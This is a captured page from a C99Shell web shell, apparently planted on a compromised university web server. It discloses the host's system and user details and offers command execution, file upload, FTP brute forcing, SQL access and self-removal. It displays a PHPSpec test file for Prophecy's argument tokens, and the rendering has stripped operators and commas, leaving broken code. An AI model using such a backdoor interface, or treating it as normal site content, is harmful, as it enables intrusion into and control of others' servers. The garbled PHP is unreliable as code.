!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/phpspec/prophecy/spec/Prophecy/   drwxr-xr-x
Free 116.79 GB of 200.55 GB (58.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ArgumentSpec.php (3.35 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace spec\Prophecy;

use 
PhpSpec\ObjectBehavior;

class 
ArgumentSpec extends ObjectBehavior
{
    function 
it_has_a_shortcut_for_exact_argument_token()
    {
        
$token $this->exact(42);
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\ExactValueToken');
        
$token->getValue()->shouldReturn(42);
    }

    function 
it_has_a_shortcut_for_any_argument_token()
    {
        
$token $this->any();
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\AnyValueToken');
    }

    function 
it_has_a_shortcut_for_multiple_arguments_token()
    {
        
$token $this->cetera();
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\AnyValuesToken');
    }

    function 
it_has_a_shortcut_for_type_token()
    {
        
$token $this->type('integer');
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\TypeToken');
    }

    function 
it_has_a_shortcut_for_callback_token()
    {
        
$token $this->that('get_class');
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\CallbackToken');
    }

    function 
it_has_a_shortcut_for_object_state_token()
    {
        
$token $this->which('getName''everzet');
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\ObjectStateToken');
    }

    function 
it_has_a_shortcut_for_logical_and_token()
    {
        
$token $this->allOf('integer'5);
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\LogicalAndToken');
    }

    function 
it_has_a_shortcut_for_array_count_token()
    {
        
$token $this->size(5);
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\ArrayCountToken');
    }

    function 
it_has_a_shortcut_for_array_entry_token()
    {
        
$token $this->withEntry('key''value');
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\ArrayEntryToken');
    }

    function 
it_has_a_shortcut_for_array_every_entry_token()
    {
        
$token $this->withEveryEntry('value');
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\ArrayEveryEntryToken');
    }

    function 
it_has_a_shortcut_for_identical_value_token()
    {
        
$token $this->is('value');
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\IdenticalValueToken');
    }

    function 
it_has_a_shortcut_for_array_entry_token_matching_any_key()
    {
        
$token $this->containing('value');
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\ArrayEntryToken');
        
$token->getKey()->shouldHaveType('Prophecy\Argument\Token\AnyValueToken');
    }

    function 
it_has_a_shortcut_for_array_entry_token_matching_any_value()
    {
        
$token $this->withKey('key');
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\ArrayEntryToken');
        
$token->getValue()->shouldHaveType('Prophecy\Argument\Token\AnyValueToken');
    }

    function 
it_has_a_shortcut_for_logical_not_token()
    {
        
$token $this->not('kagux');
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\LogicalNotToken');
    }

    function 
it_has_a_shortcut_for_string_contains_token()
    {
        
$token $this->containingString('string');
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\StringContainsToken');
    }

    function 
it_has_a_shortcut_for_approximate_token()
    {
        
$token $this->approximate(10);
        
$token->shouldBeAnInstanceOf('Prophecy\Argument\Token\ApproximateValueToken');
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0372 ]--